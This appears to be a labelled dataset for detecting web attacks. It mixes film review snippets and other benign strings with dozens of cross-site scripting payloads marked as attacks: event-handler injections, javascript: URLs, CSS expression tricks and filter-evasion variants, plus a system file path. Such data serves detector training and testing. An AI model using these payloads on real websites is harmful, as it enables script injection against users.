stringlengths 1
⌀ | label
int64 0
| idx
int64 1
---|---|---| | 0 | 28,824 |
%3C | 0 | 1,045 |
<div draggable="true" contenteditable>drag me</div><thead ondrop=alert(1) contenteditable style=display:block>drop here</thead> | 1 | 4,765 |
Aside from the fact that the film idiotically uses the website or the improperly hammy performance from poor Stephen Rea, the film gets added disdain for the fact that it is nearly impossible to look at or understand. | 0 | 23,198 |
I encourage young and old alike to go see this unique and entertaining twist on the classic whale's tale -- you won't be sorry! | 0 | 15,750 |
Far-fetched premise, convoluted plot, and thematic mumbo jumbo about destiny and redemptive love. | 0 | 24,364 |
Helps to remind the First World that HIV/AIDS is far from being yesterday's news. | 0 | 16,150 |
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><input4 id=x style="position:absolute;" onanimationcancel="print()"></input4> | 1 | 9,345 |
<iframe onbeforecut="alert(1)" contenteditable>test</iframe> | 1 | 5,672 |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | 1 | 1,432 |
<html onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></html> | 1 | 5,617 |
Less than fresh. | 0 | 24,774 |
A modest and messy metaphysical thriller offering more questions than answers. | 0 | 21,633 |
<a onpointermove=alert(1) style=display:block>XSS</a> | 1 | 2,831 |
The type of dumbed-down exercise in stereotypes that gives the (teen comedy) genre a bad name. | 0 | 23,242 |
<BR SIZE="&{alert('XSS')}"> | 1 | 13,257 |
It's a smart, funny look at an arcane area of popular culture, and if it isn't entirely persuasive, it does give exposure to some talented performers. | 0 | 18,075 |
Andy Garcia enjoys one of his richest roles in years and Mick Jagger gives his best movie performance since, well, Performance. | 0 | 15,162 |
<sub onbeforescriptexecute=alert(1)><script>1</script> | 1 | 10,045 |
<IMG SRC=javascript:alert( | 1 | 1,228 |
This rich, bittersweet Israeli documentary, about the life of song-and-dance-man Pasach'ke Burstein and his family, transcends ethnic lines. | 0 | 18,592 |
A stylish but steady, and ultimately very satisfying, piece of character-driven storytelling. | 0 | 18,202 |
Windows\system.ini | 1 | 13,735 |
Unofficially, National Lampoon's Van Wilder is Son of Animal House. Officially, it is twice as bestial but half as funny. | 0 | 22,563 |
8.49836E+11 | 0 | 25,883 |
<style>:target {color:red;}</style><frameset id=x style="transition:color 1s" ontransitionstart=alert(1)></frameset> | 1 | 8,621 |
No one can doubt the filmmakers' motives, but The Guys still feels counterproductive. | 0 | 23,559 |
0.782816305 | 0 | 27,469 |
The ingenious construction (adapted by David Hare from Michael Cunningham's novel) constantly flows forwards and back, weaving themes among three strands which allow us to view events as if through a prism | 0 | 17,209 |
avo86ne4 | 0 | 25,586 |
The Mothman Prophecies is best when illustrating the demons bedevilling the modern masculine journey. | 0 | 16,083 |
<video oncut=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test | 1 | 10,909 |
``Bad'' is the operative word for ``Bad Company,'' and I don't mean that in a good way. | 0 | 20,462 |
It's better suited for the history or biography channel, but there's no arguing the tone of the movie - it leaves a bad taste in your mouth and questions on your mind. | 0 | 23,223 |
<x oncopy=alert(1)>copy this! | 1 | 11,199 |
var t = "\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0031\u0029"; | 1 | 14,197 |
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nav id=x style="position:absolute;" onanimationcancel="print()"></nav> | 1 | 9,363 |
<SCRIPT SRC=<B> | 0 | 1,112 |
<img ondblclick="alert(1)" autofocus tabindex=1 style=display:block>test</img> | 1 | 5,873 |
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> | 1 | 1,915 |
You might be shocked to discover that Seinfeld's real life is boring. | 0 | 19,513 |
0.474692264 | 0 | 27,588 |
<nav draggable="true" ondragleave="alert(1)" style=display:block>test</nav> | 1 | 6,804 |
<style>:target {color:red;}</style><head id=x style="transition:color 1s" onwebkittransitionend=alert(1)></head> | 1 | 8,626 |
essentially an exceptionally well-written, well-edited, well-directed, well-acted, bald rip-off of Aliens. | 0 | 15,643 |
<x contenteditable oninput=alert(1)>input here! | 1 | 11,206 |
<style>:target {color: red;}</style><figure id=x style="transition:color 10s" ontransitioncancel=print()></figure> | 1 | 8,410 |
Extremely bad. | 0 | 24,719 |
<style>:target {color: red;}</style><frame id=x style="transition:color 10s" ontransitioncancel=print()></frame> | 1 | 8,414 |
<nobr draggable="true" ondragstart="alert(1)" style=display:block>test</nobr> | 1 | 6,887 |
<script\x20>javascript:alert(548)</script> | 1 | 11,780 |
Another week, another gross-out college comedy--ugh. | 0 | 21,335 |
<hr onbeforecut="alert(1)" contenteditable>test</hr> | 1 | 5,547 |
Slow, dry, poorly cast, but beautifully shot. | 0 | 20,316 |
0.034588085 | 0 | 28,054 |
<style>:target {color: red;}</style><strong id=x style="transition:color 10s" ontransitioncancel=print()></strong> | 1 | 8,487 |
<<SCRIPT>alert(844);//<</SCRIPT> | 1 | 12,076 |
<rtc onpointerout=alert(1) style=display:block>XSS</rtc> | 1 | 7,701 |
HttP:// | 1 | 13,449 |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | 1 | 13,258 |
Victor Rosa is Leguizamo's best movie work so far, a subtle and richly internalized performance. | 0 | 17,038 |
(Newton)wanders through CHARLIE completely unaware she needs to show some presence and star quality. | 0 | 22,285 |
图源:OpenAI官网 | 0 | 29,041 |
<map onpointerenter=alert(1) style=display:block>XSS</map> | 1 | 6,502 |
If Jews were Catholics, this would be Catechism | 0 | 20,242 |
<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; | 1 | 2,559 |
Each punch seen through prison bars, the fights become not so much a struggle of man vs. man as Brother-Man vs. The Man. | 0 | 17,676 |
self.tokenizer = tokenizer | 0 | 28,941 |
'Sophisticated' viewers who refuse to admit that they don't like it will likely call it 'challenging' to their fellow sophisticates. | 0 | 22,420 |
Occasionally interesting but essentially unpersuasive, a footnote to a still evolving story. | 0 | 20,762 |
0.997133606 | 0 | 28,662 |
Much of the movie's charm lies in the utter cuteness of Stuart and Margolo. Their computer-animated faces are very expressive. | 0 | 14,830 |
<IMG SRC=jAVasCrIPt:alert(803)> | 1 | 12,035 |
"`'><script>\x0Cjavascript:alert(515)</script> | 1 | 11,747 |
<strong onmouseover="alert(1)" style=display:block>test</strong> | 1 | 8,306 |
<thead onpointerover=alert(1) style=display:block>XSS</thead> | 1 | 10,541 |
<script src=1 href=1 onerror="javascript:alert(1)"></script> | 1 | 1,523 |
<style>@keyframes x{}</style><video2 style="animation-name:x" onwebkitanimationstart="alert(1)"></video2> | 1 | 10,024 |
<hr onmouseenter="alert(1)" style=display:block>test</hr> | 1 | 5,560 |
In the second half of the film, Frei's control loosens in direct proportion to the amount of screen time he gives Nachtwey for self-analysis. | 0 | 21,694 |
If Shayamalan wanted to tell a story about a man who loses his faith, why didn't he just do it, instead of using bad sci-fi as window dressing? | 0 | 21,364 |
<test data=javascript:asa | 1 | 7 |
4.44252E+11 | 0 | 26,359 |
M眉nch's genuine insight makes the film's occasional overindulgence forgivable. | 0 | 14,462 |
Has its share of arresting images. | 0 | 16,791 |
8.82861E+11 | 0 | 26,326 |
<style/onload=prompt('XSS') | 1 | 820 |
<body onscroll=javascript:alert(566)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> | 1 | 11,798 |
<svg onunload svg onunload="javascript:javascript:alert(1235)"></svg onunload> | 1 | 12,467 |
<input type=radio id=x onfocus=alert(1)> | 1 | 5,989 |
<XSS STYLE="xss:expression(alert(1667))"> | 1 | 12,899 |
The exploitative, clumsily staged violence overshadows everything, including most of the actors. | 0 | 24,228 |
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 1 | 312 |
<object onerror=alert(1) data=1 type=image/gif> | 1 | 7,066 |
0.348516402 | 0 | 27,800 | - - [29/Apr/2023 20:30:22] "GET / HTTP/1.1" 500 - | 0 | 28,931 |
<div draggable="true" contenteditable>drag me</div><tbody ondragover=alert(1) contenteditable style=display:block>drop here</tbody> | 1 | 4,752 |
Full Frontal had no effect and elicited no sympathies for any of the characters. By that measure, it is a failure. | 0 | 20,281 |
<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div> | 1 | 9,589 |
A mostly tired retread of several other mob tales. | 0 | 22,123 |